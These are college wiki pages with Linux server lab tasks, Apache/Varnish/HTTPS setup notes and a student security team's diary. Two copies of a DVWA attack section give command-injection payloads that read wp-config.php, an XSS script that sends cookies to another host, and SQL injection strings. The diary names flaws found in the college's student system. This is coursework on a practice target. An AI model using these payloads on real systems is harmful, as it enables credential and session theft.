Eksamil ole valmis demoma labor 1 raames kaitstud asju.

Kirjatööd sisu tuleb eksamil kaitsta vestluse vormis.

Eksami käigus saab kaitsta ka labor 1 ja 2 asju.

Eksami käigus tõmbad loosi, mida labor 1 raames parandada. Õppejõud teeb teenuse katki ja tudeng teeb korda. (soovitatav on eelnevalt teha teenusest varukoopia).

Punkte saab selgituse eest, mis oli katki ja kuidas tegid korda.

Katki tegemisel võib arvestada näiteks, et algaja admin (õppejõud:) muutis ära parooli, rikkus võrguseaded ja kustutas täiesti süüdimatult mõne konfifaili.

=Laborimaterjalid 2012=

Teha apt - yum ja dpkg - rpm vastavustabel. dpkg ja apt korraldused leiab [http://elab.itcollege.ee:8000/Linux-Basics.mm Linux-Basics mindmapist]

Parim töö annab 7p, järgmised 5p (piisavalt põhjalikud ja erinevad)

Ebapiisavad vastavustabelid, mis sarnanevad üksteisele punkte ei saa.

Kui su tabel on ilma vigadeta, kuid mitte parimate sead siis saad 1-2p.

'''Praks 4'''

Nimeserveri BIND9 paigaldamine.

*Mõtle välja domeenimini
*Paigalda nimeserver bind9
*Seadista oma domeen
**www.domeen
**ns.domeen
**sales.domeen
**seadista oma kliendimasin kasutama uut nimeserverit

NB: enne kaitsmist lugeda läbi http://kuutorvaja.eenet.ee/wiki/DNS

Labori üks näide [[Nimeserveri seadistamine BIND9 näitel]]

Praktikumi salvestus http://echo360.e-uni.ee/ess/echo/presentation/a828b6af-8caf-4319-b594-5d6bfed04a70

'''Punktide''' (5p) '''kirja saamiseks''' peab töötama nii nimede lahendamine läbi teie nimeserveri kui ka reverse lookup.

'''Praks 5'''

Veebiserveri apache2 paigaldamine

*Loo veebisaidid www.domeen ja sales.domeen (ehk oma DNS labori nimedele vastavad veebisaidid)
Praktikumi salvestus: http://echo360.e-uni.ee/ess/echo/presentation/0945a764-0305-48ec-8082-4e57a23cc536
*Seadist HTTPS nendele saitidele (vajadusel loo uus ip alias ja muuda nimeserveris olevat kirjet, et TLS nimed viitaks erinevatele IP aadressidele)
*Abiks on loeng: http://enos.itcollege.ee/~mernits/infrastruktuur/loeng04%20-%20Veebiserver.odp ja labor: https://wiki.itcollege.ee/index.php/Veebiserveri_labor_v.2
*Paigalda WordPress vastavalt juhendile: http://goo.gl/6XQ0U

'''Punktide''' (5p) '''kirja saamiseks''' peab töötama veebiserververi apache2 pealt 2 veebilehte ning wordpress. Wordpressile peab olema paigaldatud super cache ning lisaks peab töötama varnish. Seejuures wordpress on seadistatud pordile 80 ja wordpress pordil 8080. Lehe toimivust testige enne kaitsmist ab vahendiga, kus -n 1000 ja -t 10.

'''Praks 7'''
Samba share-i välja jagamine.

*Loo share, mis on ligipääsetav vaid kasutajatele, kes kuuluvad lab gruppi. Vajalik on ka share-ile kirjutamisõigus (saab kausta luua).
* Seadista samba abil kasutajate kodukaustadele ligipääsemine. Iga kasutaja peab ligi pääsema enda kodukaustale.

*Abiks on viki artiklid : https://wiki.itcollege.ee/index.php/Failiserver_Samba_labor_2 ja https://wiki.itcollege.ee/index.php/Lihtne_samba_install

'''Punktide''' (5p) '''kirja saamiseks''' on vajalik share-i olemasolu, mis on ligipääsetav ning kirjutatav (võimalik luua kataloogi) ainult lab gruppi kuuluvatele kasutajatele ning lab gruppi mitte kuuluvad kasutajad ei tohi sinna ligi pääseda.
Lisaks peavad kasutajad pääsema ligi oma kodukaustale, sõltumata sellest, kas ta kuulub lab gruppi või mitte.

'''Labor 1'''
*Veebiserver ja virtualhostid
*DNS
*e-post
*iptables
*samba

'''Labor 2'''
*LDAP või Samba4 - LDAP Teet Saar, Kullo-Kalev Aru
*Puppet või chef
*PAM
*Puppet (Ubuntus) - Kristo Kapten
*[[Samba(windows domeenis fileserver)]] - Marko Kurs
*[[TLS termineerimine nginx abil]] - Sander Arnus, Sander Saveli

Virtualhost apache2 näitel

2013-05-06T12:01:49Z

Saus: /* Varnish */

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
service apache2 restart
netstat -lntp
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

Nüüd tuleb seadistada apache veebiserver selliselt, et logis kasutatakse seda custom-logi formaati. Selleks tuleb avada soovitud veebiserveri konfiguratsioon asukohas:

<source lang="bash">
cd /etc/apache2/sites-available/
</source>
Avage soovitud veebiserveri konfiguratsioonifail. Antud näites kasutan "wp"-nimelist faili.

<source lang="bash">
nano wp
</source>

Sinna tuleb kirjutada CustomLog'i rea asemele

<source lang="bash">
CustomLog ${APACHE_LOG_DIR}/access.log varnishcombined
</source>

Nüüd tuleb muuta apache2 konfiguratsiooni, kuhu tuleb seadistada varnishcombined logiformaat. Selleks liigu asukohta

<source lang="bash">
cd /etc/apache2/conf.d/
</source>

Tee sinna uus fail nimega näiteks '''varnishlog.conf'''
<source lang="bash">
nano varnishlog.conf
</source>

Kirjuta sinna see rida
<source lang="bash">
LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" varnishcombined
</source>

Tee apache2 teenusele restart
<source lang="bash">
service2 apache restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
</source>

Virtualhost apache2 näitel

2013-05-06T09:44:38Z

Saus: /* cmd exec */

<pre>
/etc/hosts

192.168.56.101 www.planet.zz
192.168.56.101 sales.planet.zz
</pre>

<source lang="bash">

ping www.planet.zz

ping sales.planet.zz

apt-get update
apt-get dist-upgrade

apt-get install apache2

mkdir -p /var/www/www.planet.zz
mkdir -p /var/www/sales.planet.zz
cp /var/www/index.html /var/www/www.planet.zz
cp /var/www/index.html /var/www/sales.planet.zz
vim /var/www/www.planet.zz/index.html
vim /var/www/sales.planet.zz/index.html
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/www.planet.zz
cp /etc/apache2/sites-available/default /etc/apache2/sites-available/sales.planet.zz

vim www.planet.zz
vim sales.planet.zz

a2ensite www.planet.zz
a2ensite sales.planet.zz
service apache2 reload

</source>

=Varnish=
Esmaselt tõstame apache2 porti 8080

<pre>
/etc/apache2/ports.conf
NameVirtualHost *:8080
Listen 8080
</pre>
<source lang="bash">
cd /etc/apache2/sites-available
sed 's/:80/:8080/' default -i
sed 's/:80/:8080/' wp -i
sed 's/:80/:8080/' sales.planet.zz -i
sed 's/:80/:8080/' www.planet.zz -i
service apache2 restart
netstat -lntp
apt-get install varnish
vim /etc/default/varnish
</source>
<pre>
DAEMON_OPTS="-a :80 \
-T localhost:6082 \
-f /etc/varnish/default.vcl \
-S /etc/varnish/secret \
-s malloc,256m"
</pre>
Faili /etc/varnish/default.vcl lisada X-Forwarded-For sedmine
<pre>
sub vcl_recv {

# Add a unique header containing the client address

remove req.http.X-Forwarded-For;

set req.http.X-Forwarded-For = client.ip;

# [...]

}

</pre>
<source lang="bash">
service varnish restart
</source>

=DVWA ründed=
=HTTPS konfigureerimine=

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): /etc/ssl/private/www.planet.zz.key
<pre>
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /etc/ssl/private/www.planet.zz.key.
Your public key has been saved in /etc/ssl/private/www.planet.zz.key.pub.
The key fingerprint is:
76:6e:6a:b4:1b:75:7e:39:18:12:59:ee:9c:4c:b9:ef root@server
The key's randomart image is:
+--[ RSA 2048]----+
| . |
| + . |
| o + |
| * o |
| S + O |
| ..+ + + . |
| ...o o = |
| o+ o . |
| .o. E |
+-----------------+
</pre>

openssl req -new -key /etc/ssl/private/www.planet.zz.key -out /root/www.planet.zz.req

sudo openssl x509 -req -days 3650 -in /root/www.planet.zz.req -signkey /etc/ssl/private/www.planet.zz.key -out /etc/ssl/certs/www.planet.zz.pem

<pre>
Signature ok
subject=/C=EE/ST=Harjumaa/L=Tallinn/O=Planet/OU=IT/CN=www.planet.zz
Getting Private key
</pre>

cp /etc/apache2/sites-available/default-ssl /etc/apache2/sites-available/www.planet.zz-ssl

Seal muuta sisu (sert, dokument root, keyfail)

Lisa ServerName, Muuda DocumentRoot, Muuda SSLCertificateFile ja SSLCertificateKeyFile

<pre>
ServerName www.planet.zz
DocumentRoot /var/www/www.planet.zz
SSLCertificateFile /etc/ssl/certs/www.planet.zz.pem
SSLCertificateKeyFile /etc/ssl/private/www.planet.zz.key
</pre>

a2enmod ssl

a2ensite www.planet.zz-ssl

service apache2 restart

=ID kaart=

[[ID kaardiga autentimine Apache2 veebiserveriga]]

=DVWA ründed=
==cmd exec==
<source lang="bash">
8.8.8.8; sed 's/</UUUU/' ../../config/config.inc.php
</source>

<source lang="bash">
8.8.8.8; ls -l
8.8.8.8; ls -l ../
8.8.8.8; ls -l ../../
#jne, kuni kõik failid/kataloogid on teada
8.8.8.8; sed 's/<//' ../../../../wordpress/wp-config.php
</source>

Loon faili kala /var/tmp kataloogi
<source lang="bash">
8.8.8.8; touch /var/tmp/kala.txt
</source>

Ning kontrollin kas fail loodi
<source lang="bash">
8.8.8.8; ls /var/tmp/
</source>

Kuidas teada saada, kas küpsised on JavaScriptile kasutamiseks lubatud või mitte. Lahendus kasutab command execution'it (XSS auku pole leitud, ei saa kasutada, ...)
<source lang="bash">
; grep session.cookie_httponly /etc/php5/apache2/php.ini
</source>
Väljund:
* kui küpsised ei ole JavaScriptile loetavad, siis on väljund selline:

'''session.cookie_httponly = 1'''

* kui küpsised on JavaScriptile loetavad, siis on väljund selline (HINT: Tegutse ruttu! :))

'''session.cookie_httponly = 0'''

==XSS==
<source lang="javascript">
<script>var i='<img src="http://192.168.56.101/'+document.cookie+'" />'; document.write(i);</script>
</source>
==veel XSSi==
<pre>
%3Cscript%3Evar+i%3D%27%3Cimg+src%3D%22http%3A%2F%2F192.168.56.101%2F%27%2Bdocument.cookie%2B%27%22+%2F%3E%27%3B+document.write%28i%29%3B%3C%2Fscript%3E
</pre>
==SQLi==
<source lang="sql">
#blind
1' union select BENCHMARK(100000000,ENCODE('hello','goodbye')),1; # --

2' union select TABLE_SCHEMA, TABLE_NAME from information_schema.tables;# --

3' union select TABLE_NAME,COLUMN_NAME from information_schema.columns; # --
</source>

Security

2013-04-05T09:04:03Z

Saus: /* Materials (slides etc) */

Team page for [[Deploying IT Infrastructure Solutions]].

==Team Members==
*Sten Aus, Estonian Information Technology College
*Matis Palm, Estonian Information Technology College
*Sandra Suviste, Estonian Information Technology College
*Markus Rintamäki, Vaasa University of Applied Sciences
*Tomas Lepistö, Vaasa University of Applied Sciences
*Mika Salmela, Vaasa University of Applied Sciences
*Kęstutis Tautvydas, Vilnius University of Applied Sciences
*Jurij Lukjančikov, Vilnius University of Applied Sciences

==Goal==
*OWASP top 10
*HACK DVWA
*BackTrack, SamuraiCD (Last year experience)
*Scanning and testing tools - Qualys SSL Labs
*Acunetix Web Vulnerability Scanner v.8
*SubGraph Vega
*BEAST attack
*RC4

==Activity==
===Monday - 25.03.13===
'''Things what we did that day:'''
* Lectures
* Sumorobot programming
* Dinner @ St Patricks

===Tuesday - 26.03.13===
'''Things what we did that day:'''
* Documentation!
A1 Injection - Sandra 

A2 Broken Authentication and Session Management (was formerly A3) - Kestutis 

A3 Cross-Site Scripting (XSS) (was formerly A2) - Kestutis 

A4 Insecure Direct Object References - Markus 

A5 Security Misconfiguration (was formerly A6)- Tomas 

A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - Mika 

A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - Sten 

A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - Matis 

A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - Jurij 

A10 Unvalidated Redirects and Forwards - Sten 

'''Problems what we faced:'''
* Still need to get everyone a VM with DVWA running

'''Things what we plan to do:'''
* Copy Paste documentation tasks to Wiki :)
* Divide OWASP tasks

===Wednesday - 27.03.13===
'''Things what we did that day:'''
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti's presentation and Wireshark.
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)

'''Problems what we faced:'''
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it's nothing.

'''Things what we plan to do:'''
* Estonian members are going to study last year's report and going to make a short overview to other members about it.
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher's side as well, because teachers have a little more access than students (grades, information about student etc).
* In demo environment we are going to test new functions (what haven't been included in main environment, yet) - as there's some new functionality.

===Thursday - 28.03.13===
'''Things what we did that day:'''
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])
* Discussed the schedule and to-do list for next days
* Discussed some potential vulnerabilities of SIS
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.
* Prepared software for testing (Backtrack, Kali)

'''Problems what we faced:'''
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line ("Start here and go this way"), we will just need to start and see what we will find.

'''Things what we plan to do:'''
* Find attack examples for the vulnerabilities
* Try them out on DVWA
* Get familiar with Tamper Data, Kali and Backtrack
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS
* See how to get authentication info from POST and GET

'''Security threat of a day'''
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What's more -> developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!

===Friday - 29.03.13===
'''Things what we did that day:'''
* Learned how to perform attacks. We learned different attack methods and tried them out.
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.
* Talked about last year's experience. Tried if most of the security holes are patched or not.

'''Problems what we faced:'''
* We need student access to developer environment
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)

'''Things what we plan to do:'''
* Analysis of the results needs to be done
* Learn a little bit more about attacks
* Create some attacks
* Start to test simpler attacks to SIS

'''Security threats of the day:'''
* One can see other student's exam plan just by chaning student_id value in the URL (you don't need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to "My data" and just change ID from the URL again.
''For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322''

===Saturday - 30.03.13===
'''Things what we did that day:'''
* Visiting Tallinn TV Tower
* Visitinig The Seaplane Harbour

===Sunday - 31.03.13===
'''Free day'''

===Monday - 01.04.13===
'''NB! April fools' day!''' Beware!

'''Things what we did that day:'''
* We analyzed student information fields in "My data" section
* We test different sections and tried to change user IDs - luckily these are safe now.
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!
* Tried reflected XSS, most SIS areas escape "bad characters" out from input boxes.
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons ''(for example: other person taking exams claiming he/she is someone he/she is not)''

'''Problems what we faced:'''
* Still no new declaration etc opened for us. Maybe tomorrow?

'''Things what we plan to do:'''
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don't have much time left.
* Go deeper with different attacks and methods.

'''Security threat's of the day:'''
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user's cookies and then grant access to attacker.
* There's no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.
* Calendar: there's no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.
* There are some developer's notes left in different SIS parts (not only in developer environment).

===Tuesday - 02.04.13===
'''Things what we did that day:'''
* Visiting Skype office.
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.
* SIS is using a field called "security_key_sis_global". This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person's name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on "Forgot my password".

'''Problems what we faced:'''
* Really would have liked to have more time to test.

'''Things what we plan to do:'''
* Prepare and rehearse the presentation
* Look further into the e-mail modification issue.
* Finalise ASVS review

===Wednesday - 03.04.13===
'''Things what we did that day:'''
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to "audience".
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.

'''Problems what we faced:'''
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.

'''Things what we plan to do:'''
* We want to review and rehearse our final presentation.
* Update our documentation in Wiki.
* Upload and link presentations to persons and fill gaps in documentation.

===Thursday - 04.04.13===
'''Things what we did that day:'''
* Dress rehearsal. Updated presentation according to feedback and capabilities.
* Updated documentation to Wiki and uploaded missing presentations.
* Personal input section filling in Wiki.
* Went bowling. :)

'''Problems what we faced:'''
* Sometimes one minute feels like it is not a minute. :)

'''Things what we plan to do:'''
* Final documentation (link to Google docs).
* IP feedback
* Summarisation

===Friday - 05.04.13===
'''Things what we did that day:'''
* Discussion about today's plans.
* Upgraded and linked final documentation from Google Drive (aka Google Docs) (link can be found in Materials[[#Materials_.28slides_etc.29]] section and [[#Final documentation]] section).
* Every member wrote a feedback to Wiki page
* Every member wrote a feedback according to requirements of the Intensive Programme (Erasmus feedback)
* IP summarisation.
* Farewell party at St. Patrick's.

'''Problems what we faced:'''

'''Things what we plan to do:'''
* Farewell party, sleep well and start trip to home! :)

===Saturday - 06.04.13===
'''Departure! Bye bye!'''

==Materials (slides etc)==
* '''Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother'''
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)

* '''Day summarisation:'''
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]

* '''Security teamwork (whiteboard):'''
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)

* '''Virtual Machines (VM VirtualBox .ova files):
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]

* '''Final presentation of the project to the clients (4 April 2013)'''
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] ''(Made by whole team, structure by Sandra and Jurij)''
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] ''(Team Security starts from 18:30)''

* '''Final documentation'''
** Can be found in Google Drive [https://docs.google.com/document/d/1ACCHfErxIn1U__bfTr1TTRNRRLJM9F2rZZ9dttgjed8/edit (Final Documentation)].

==Results==
Summary of what we did and solution what we developed

===Personal input===
====Sten Aus====
* '''What I did:'''
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).

* '''What I learned:'''
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.
** I learned how big value "same day feedback and summarisation" has.
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).

====Matis Palm====
* '''What I did:'''
** Helped teaching Apache & Linux & DVWA to other participants (due to having some experience already from before).
** Helping with sumorobot programming (Being from the robotics club).
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.

* ''' What I learned:'''
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).

====Sandra Suviste====
* '''What I did:'''
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).
** Practised attacks on the DVWA.
** Went through the OWASP ASVS document for possible shortcomings of the SIS.
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.
** Documented my own and others' work.
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]).

* '''What I learned:'''
** A lot about web application vulnerabilities - from my own research & practice and from others' presentations and teachers' lectures.
** Became more experienced in working in a multinational group with English as the working language.
** I learned how to document my work in order to keep track of the work of the team.
** I also learned what are the issues connected to the preparing of and giving a presentation with several (>3) presenters.

====Markus Rintamäki====
* '''What I did:'''
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).
** Different attacks on SIS, changing user ids, SQL injection and XSS.
** Tried to upload a picture (for a lecturer) infected with malicious .php code.
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.
** We made the presentation structure together.
** Googeled a lot :)

* '''What I learned:'''
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.
** Basic attack methods in DVWA: SQL injection, XSS and CSRF.
** What is SIS and how does it works?
** I also learned to program sumorobots, more about Linux and Wireshark.
** And also of course I learned to speak english more fluently. :)

====Tomas Lepistö====
* '''What I did:'''
** Tried to find out possible security holes from OIS site.
** Tested different attacking methods with DVWA
** SQL-injection tests into various places on OIS site.
** Tested some XSS methods
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).
** Prepared our presentation with other group members
** Spoke in daily summary
** Studied a lot of information to know what is hacking about?

* '''What i learned:'''
** I learned how to use SQL-injection, XSS, Brute force, CSRF
** I learned also how to use Kali,Backtrack,Temper data, DVWA
** Working in international group
** How important documentation is
** Found out how important it is to make web-application secure

====Mika Salmela====
* '''What I did:'''
** I studied hacking methods
** Tried some hacking methods with DVWA
** Iscanned website, try to find if there is some security risks
** Tried some SQL and XSS injections
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).

* '''What I learned:'''
** More than basics of how to hack?
** The most common hacking methods and how to use them.
** How to do SQL and XSS injections
** Basics of hacking tools
** How to find security risks
** How to work in international team.
** Learned much about what these are: DVWA, OWASP and ASVS.

====Kęstutis Tautvydas====
* '''What I did:'''
